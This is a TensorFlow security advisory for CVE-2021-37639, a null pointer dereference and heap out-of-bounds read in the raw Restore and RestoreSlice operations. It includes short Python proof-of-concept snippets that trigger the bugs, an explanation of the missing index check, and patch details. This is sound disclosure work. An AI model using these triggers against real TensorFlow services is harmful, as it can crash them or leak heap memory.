• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1## TFSA-2021-113: Null pointer dereference and heap OOB read in operations restoring tensors
2
3### CVE Number
4CVE-2021-37639
5
6### Impact
7When restoring tensors via raw APIs, if the tensor name is not provided,
8TensorFlow can be tricked into dereferencing a null pointer:
9
10```python
11import tensorflow as tf
12
13tf.raw_ops.Restore(
14  file_pattern=['/tmp'],
15  tensor_name=[],
16  default_value=21,
17  dt=tf.int,
18  preferred_shard=1)
19```
20
21The same undefined behavior can be triggered by `tf.raw_ops.RestoreSlice`:
22
23```python
24import tensorflow as tf
25
26tf.raw_ops.RestoreSlice(
27  file_pattern=['/tmp'],
28  tensor_name=[],
29  shape_and_slice='2',
30  dt=inp.array([tf.int]),
31  preferred_shard=1)
32```
33
34Alternatively, attackers can read memory outside the bounds of heap allocated
35data by providing some tensor names but not enough for a successful restoration:
36
37```python
38import tensorflow as tf
39
40tf.raw_ops.Restore(
41  file_pattern=['/tmp'],
42  tensor_name=['x'],
43  default_value=21,
44  dt=tf.int,
45  preferred_shard=42)
46```
47
48The
49[implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/save_restore_tensor.cc#L158-L159)
50retrieves the tensor list corresponding to the `tensor_name` user controlled
51input and immediately retrieves the tensor at the restoration index (controlled
52via `preferred_shard` argument). This occurs without validating that the
53provided list has enough values.
54
55If the list is empty this results in dereferencing a null pointer (undefined
56behavior). If, however, the list has some elements, if the restoration index is
57outside the bounds this results in heap OOB read.
58
59### Patches
60We have patched the issue in GitHub commit
61[9e82dce6e6bd1f36a57e08fa85af213e2b2f2622](https://github.com/tensorflow/tensorflow/commit/9e82dce6e6bd1f36a57e08fa85af213e2b2f2622).
62
63The fix will be included in TensorFlow 2.6.0. We will also cherrypick this
64commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are
65also affected and still in supported range.
66
67### For more information
68Please consult [our security
69guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
70more information regarding the security model and how to contact us with issues
71and questions.
72
73### Attribution
74This vulnerability has been reported by members of the Aivul Team from Qihoo
75360.
76